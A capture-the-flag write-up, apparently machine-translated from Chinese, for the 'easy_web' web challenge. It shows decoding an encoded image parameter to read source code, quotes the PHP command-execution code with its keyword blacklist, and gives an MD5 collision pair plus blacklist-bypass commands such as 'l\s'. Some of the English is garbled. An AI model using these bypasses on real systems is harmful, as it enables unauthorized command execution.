当前位置:网站首页>[AnXun cup 2019] easy_web
[AnXun cup 2019] easy_web
2022-08-02 22:36:00 【The wind -】
Inspect knowledge points:
1. The sensitivity of decryption (or the strength of the tool)
2.md5 accumulation of strong comparisons
3. Function accumulation of reading files
Solution:
Enter the page to directly burp the packet:

There is an img=TXpVek5UTTFNbVUzTURabE5qYz0, let's put it directly into the script and run it:

The script is easy to write, just write one according to the way you like.It is decoded and found to be 555.png. Because of the characteristics of the url here, it should only be encoded three times here:
hex->base64->base64
Then let's try to read the page source code:

Then paste it into img

Decode it
';die("xixiï½ no flag");} else {$txt = base64_encode(file_get_contents($file));echo "
";echo "
";}echo $cmd;echo "
";if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {echo("forbid ~");echo "
";} else {if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])){echo `$cmd`;} else {echo ("md5 is funny ~");}}?>
There is a lot of filtering about cmd, and there is another entry condition
(string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])
Simple, fry the bottom of the house:
a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
Posture one:
sort /flag

The lack of this posture is that I don't know the name of the flag, so I have to guess
Pose Two:
l\s

This method is very useful to bypass, and you can also know the flag name

边栏推荐
- 松鼠短视频系统为用户加入随机头像代码-快速为用户加上随机头衔
- 软考 ----- UML设计与分析(下)
- 【软件工程导论】软件工程导论笔记
- AI科学家:自动发现物理系统的隐藏状态变量
- 脑机接口003 | 马斯克称已实现与云端的虚拟自己对话,相关概念股份大涨
- 解析Collection接口中的常用的被实现子类重写的方法
- Five data structures of Redis and their corresponding usage scenarios
- You want the metagenomics - microbiome knowledge in all the (2022.8)
- JVM内存和垃圾回收-03.运行时数据区概述及线程
- [安洵杯 2019]easy_web
猜你喜欢

基于OpenGL的冰川与火鸟(光照计算模型、视景体、粒子系统)

idea 配置resin

Nature Microbiology综述:聚焦藻际--浮游植物和细菌互作的生态界面

安装Mac版Mysql卡在Installation阶段,彻底清理mysql并重装mysql

J9 digital theory: the Internet across chain bridge has what effect?

NC | Structure and function of soil microbiome reveal N2O release from global wetlands

JVM内存和垃圾回收-04.程序计数器(PC寄存器)

Gradle系列——Gradle的build.gradle文件详情,项目发布(基于Gradle文档7.5)day3-3

快速掌握jmeter(一)——实现自动登录与动态变量

Parse the commonly used methods in the List interface that are overridden by subclasses
随机推荐
Golang sync/atomic 包的原子操作说明
清除浮动与BFC
【LeetCode】622. 设计循环队列
el-tree渲染大量数据的解决方案(不通过懒加载)
LeetCode:622. 设计循环队列【模拟循环队列】
线程池原理与实践|从入门到放弃,深度解析
Metaverse 001 | Can't control your emotions?The Metaverse is here to help you
当TIME_WAIT状态的TCP正常挥手,收到SYN后…
openlayers version update difference
shell:条件语句
【LeetCode】1374. 生成每种字符都是奇数个的字符串
E. Add Modulo 10(规律)
聊一聊 AS 的一些好用的功能
golang刷leetcode 经典(10) tire树与ac自动机
EMQX Newsletter 2022-07|EMQX 5.0 正式发布、EMQX Cloud 新增 2 个数据库集成
栈、队列和数组
You want the metagenomics - microbiome knowledge in all the (2022.8)
扫码预约 | 观看Apache Linkis数据处理实践以及计算治理能力
ssh configuration
一款好用的FAQ搭建工具